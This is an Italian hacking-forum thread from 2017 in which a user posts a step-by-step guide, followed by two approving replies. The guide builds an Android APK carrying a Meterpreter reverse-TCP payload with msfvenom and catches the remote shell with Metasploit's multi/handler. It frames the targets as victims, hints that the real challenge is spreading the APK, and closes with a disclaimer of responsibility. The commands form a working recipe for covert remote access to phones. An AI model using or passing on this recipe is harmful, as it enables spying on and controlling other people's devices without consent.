1. A breve aggiorneremo la piattaforma di Reboot per risolvere alcuni problemi con i plug-in, quindi chiediamo ancora un po' di pazienza, Lo staff di Reboot

Creazione di un payload per android e utilizzaro con Metasploit.

Discussione in 'Sicurezza informatica' iniziata da alsacchi, 21 Lug 2017.

  1. alsacchi

    alsacchi Livello 7

    Iscritto:
    25 Gen 2017
    Messaggi:
    171
    Like ricevuti:
    83
    Ed ecco una guida utile ai curiosoni. In questa guida vedremo come creare un payload, vedi la sotto la voce "approfondimenti" per più spiegazioni, in un file apk per aprire una shell meterpreter per avere accesso ad un dispositivo android per qualsiasi verione.
    In questa guida non viene scritto come utilizzare il payload all'esterno della propria connessione locale per motivi di sicurezza e responsabilità.

    APPROFONDIMENTI

    PAYLOAD: Eseguibile che viene eseguito insieme ad una altro software attivato a distanza o localmente come dall'apertura di un app.
    APK: Pacchetto di installazzione sui dispositivi Android.

    REQUISITI

    • Metasploit
    • MsfVenom
    • Un Dispositivo Android
    • Una connessione internet
    PROCEDIMENTO

    Prima di tutto dobbiamo trovare il nostro ip locale:
    - Windows: ipconfig, leggete la voce "Ip Address"
    - Linux o Osx: ifconfig, leggete la voce "inet"
    Poi bisogna creare il payload, semplicemente ci basta utilizzare il comando msfvenom
    Codice:
    msfvenom -p android/meterpreter/reverse_tcp LHOST=<iplocale> LPORT=4444 R > nomeapk.apk
    Aspettiamo qualche secondo è ci verra creata la nostra apk con il payload inserito. (In una guida a parte farò vedere come inserire il payload dentro un applicazione)
    Ricordate il vero problema non è creare e utilizzare il payload ma diffonderlo :wink:.

    Dopo aver installato il file apk su un dispotivo Android apriamo metasploit con il comando
    Codice:
    msfconsole
    e scriviamo
    Codice:
    use exploit/multi/handler
    poi dobbiamo dirgli che payload abbiamo usato quindi:
    Codice:
    set payload android/meterpreter/reverse_tcp
    e infine l'indirizzo e la porta utilizzata
    Codice:
    set LHOST <indirizzoip>
    Codice:
    set LPORT 4444
    Fatto questo ci basterà scrivere "run" e inizierà ad aspettare che qualche vittima apra l'applicazione ed è fatta ci si aprirà una shell meterpreter e avremo accesso al telefono, scrivete "help" nella shell per avere la lista dei comandi.



    IO NON MI ASSUMO NESSUNA RESPONSABILITA' PER QUELLO CHE FARETE CON QUESTA GUIDA
     
    #1
    Ultima modifica: 21 Lug 2017
    A 23Dvalin, Fry Scatter, student e 2 altri utenti piace questo elemento.
  2. MODD3R

    MODD3R Ospite

    Grande alsacchi:sunglasses: io ci zazzico spesso e mi sarà utile
     
    #2
    A iostream e alsacchi piace questo messaggio.
  3. thefastnick

    thefastnick Staff Android Killer Staff

    Iscritto:
    6 Gen 2015
    Messaggi:
    356
    Like ricevuti:
    158
    Guida interessante :wink:
     
    #3
    A alsacchi piace questo elemento.
Sto caricando...

Condividi questa Pagina